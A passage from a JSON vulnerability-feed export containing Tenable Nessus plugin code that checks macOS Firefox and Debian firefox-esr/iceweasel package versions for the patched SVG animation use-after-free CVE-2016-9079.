exploit this\nissue, via a specially crafted web page, to deference already freed\nmemory, resulting in the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox version 50.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9079\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nif (get_kb_item(kb_base + '/is_esr')) exit(0, 'The Mozilla Firefox installation is in the ESR branch.');\n\nmozilla_check_version(product:'firefox', version:version, path:path, esr:FALSE, fix:'50.0.2', severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:58", "description": "A use-after-free vulnerability in the SVG Animation was discovered in the Mozilla Firefox web browser, allowing a remote attacker to cause a denial of service (application crash) or execute arbitrary code, if a user is tricked into opening a specially crafted website.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "Debian DSA-3728-1 : firefox-esr - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:firefox-esr", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3728.NASL", "href": "https://www.tenable.com/plugins/nessus/95445", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3728. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95445);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_xref(name:\"DSA\", value:\"3728\");\n\n script_name(english:\"Debian DSA-3728-1 : firefox-esr - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A use-after-free vulnerability in the SVG Animation was discovered in\nthe Mozilla Firefox web browser, allowing a remote attacker to cause a\ndenial of service (application crash) or execute arbitrary code, if a\nuser is tricked into opening a specially crafted website.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/firefox-esr\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3728\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the firefox-esr packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 45.5.1esr-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:firefox-esr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-dbg\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-dev\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ach\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-af\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-all\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-an\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ar\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-as\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ast\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-az\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-be\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-bg\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-bn-bd\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-bn-in\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-br\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-bs\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ca\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-cs\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-cy\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-da\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-de\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-dsb\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-el\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-en-gb\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-en-za\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-eo\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-es-ar\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-es-cl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-es-es\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-es-mx\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-et\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-eu\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-fa\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ff\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-fi\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-fr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-fy-nl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ga-ie\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-gd\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-gl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-gn\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-gu-in\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-he\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hi-in\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hsb\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hu\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hy-am\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-id\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-is\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-it\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ja\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-kk\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-km\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-kn\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ko\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-lij\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-lt\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-lv\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-mai\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-mk\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ml\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-mr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ms\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-nb-no\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-nl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-nn-no\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-or\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-pa-in\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-pl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-pt-br\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-pt-pt\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-rm\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ro\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ru\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-si\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sk\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-son\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sq\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sv-se\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ta\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-te\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-th\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-tr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-uk\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-uz\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-vi\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-xh\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-zh-cn\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-zh-tw\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-dbg\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-dev\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ach\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-af\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-all\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-an\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ar\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-as\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ast\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-az\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-be\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-bg\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-bn-bd\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-bn-in\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-br\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-bs\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ca\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-cs\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-cy\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-da\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-de\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-dsb\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-el\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-en-gb\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-en-za\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-eo\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-es-ar\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-es-cl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-es-es\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-es-mx\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-et\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-eu\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-fa\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ff\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-fi\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-fr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-fy-nl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ga-ie\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-gd\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-gl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-gn\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-gu-in\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-he\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hi-in\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hsb\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hu\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hy-am\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-id\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-is\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-it\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ja\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-kk\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-km\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-kn\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ko\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-lij\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-lt\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-lv\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-mai\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-mk\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ml\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-mr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ms\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-nb-no\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-nl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-nn-no\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-or\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-pa-in\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-pl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-pt-br\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-pt-pt\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-rm\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ro\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ru\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-si\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sk\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sl\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-son\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sq\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sv-se\", reference:\"45.5.1esr-1~deb8u1\")) 